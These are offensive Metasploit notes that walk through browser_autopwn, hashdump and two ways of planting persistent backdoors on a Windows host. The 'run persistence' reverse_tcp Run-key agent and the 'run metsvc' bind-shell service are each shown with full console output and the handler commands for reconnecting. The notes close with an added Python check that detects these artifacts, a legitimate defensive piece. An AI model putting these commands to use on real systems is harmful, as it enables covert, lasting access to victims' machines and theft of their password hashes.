search autopwn
use server/browser_autopwn
show options
set LHOST
set SRVPORT
set URIPATH /
show options
Modify the etter.conf file
if you use ipchains
if you use iptables
After obtaining sessions
run hashdump
run persistence -X -i 5 -p 445 -r 192.168.1.106
Metasploit: a thing or two about establishing a backdoor
1. meterpreter built-in scripts
Method 1. run persistence
Use run persistence -h to view the options:
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.1.139
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN03SP0_20130122.2044/WIN03SP0_20130122.2044.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.139 LPORT=443
[*] Persistent agent script is 609496 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
[*] Executing script C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs
[+] Agent executed with PID 3272
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FCBCUBtLrzFY
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FCBCUBtLrzFY
As you can see, the autostart entry is added through a registry key value, and what it launches is the VBS script backdoor.
Connect:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf exploit(handler) > set LHOST 192.168.1.139
LHOST => 192.168.1.139
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Started bind handler
[*] Starting the payload handler...
It is not started by default; after the target machine reboots, a meterpreter shell is obtained successfully.
Method 2. run metsvc
Run the metsvc script
meterpreter > run metsvc -A
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\kqaqtcsWhBTbO...
[*] >> Uploading metsrv.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
[*] Trying to connect to the Meterpreter service at 192.168.1.108:31337...
The newly created service is added to autostart (image name metsvc.exe, service name metsvc); connect to the backdoor:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 192.168.1.108
RHOST => 192.168.1.108
msf exploit(handler) > exploit
[*] Started bind handler
[*] Starting the payload handler...
meterpreter >
Connected successfully.
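A defender-side check for the two artifacts these sessions leave behind (a Run-key value launching a VBS file from the TEMP directory, and a service named metsvc whose binary lives in a temp folder), written as an added example that is not part of the original notes. The registry and service entries are constructed in-line to mimic the output above; the value names, file names and paths are made up.

```python
import re

# Constructed sample data modelled on the artifacts shown in the sessions above.
# Tuples: (registry key, value name, command). Names and paths are made up.
RUN_KEY_ENTRIES = [
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "FCBCUBtLrzFY",
     r"C:\WINDOWS\TEMP\zvlYoXnVYFbR.vbs"),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r"C:\Windows\System32\SecurityHealthSystray.exe"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
]
# Tuples: (service name, image path). Constructed to match the metsvc install log.
SERVICE_ENTRIES = [
    ("metsvc", r"C:\WINDOWS\TEMP\kqaqtcsWhBTbO\metsvc.exe"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
]

TEMP_DIR = re.compile(r"(\\temp\\|%temp%)", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|js|jse|wsf|bat|cmd|ps1|hta)\b", re.I)
KNOWN_BACKDOOR_SERVICES = {"metsvc"}   # service name used by the metsvc script

def looks_random(name):
    """Heuristic: letters only, 8+ chars, and a very low vowel ratio."""
    if not re.fullmatch(r"[A-Za-z]{8,}", name):
        return False
    vowels = sum(c in "aeiouAEIOU" for c in name)
    return vowels / len(name) < 0.25

def autorun_findings(entries):
    """Return (key, name, reasons) for Run-key values showing two or more signals."""
    findings = []
    for key, name, command in entries:
        reasons = []
        if TEMP_DIR.search(command):
            reasons.append("launches from a temp directory")
        if SCRIPT_EXT.search(command):
            reasons.append("runs a script-host file")
        if looks_random(name):
            reasons.append("value name looks randomly generated")
        if len(reasons) >= 2:   # two independent signals keep false positives down
            findings.append((key, name, reasons))
    return findings

def service_findings(services):
    """Return (name, reasons) for services with a known backdoor name or temp-dir binary."""
    findings = []
    for name, image_path in services:
        reasons = []
        if name.lower() in KNOWN_BACKDOOR_SERVICES:
            reasons.append("service name matches a known Metasploit backdoor")
        if TEMP_DIR.search(image_path):
            reasons.append("service binary lives in a temp directory")
        if reasons:
            findings.append((name, reasons))
    return findings
```

On a live host the same functions can be fed the real HKCU/HKLM Run values and the service list; the regexes are deliberately broad, so treat a single signal as a lead rather than a verdict.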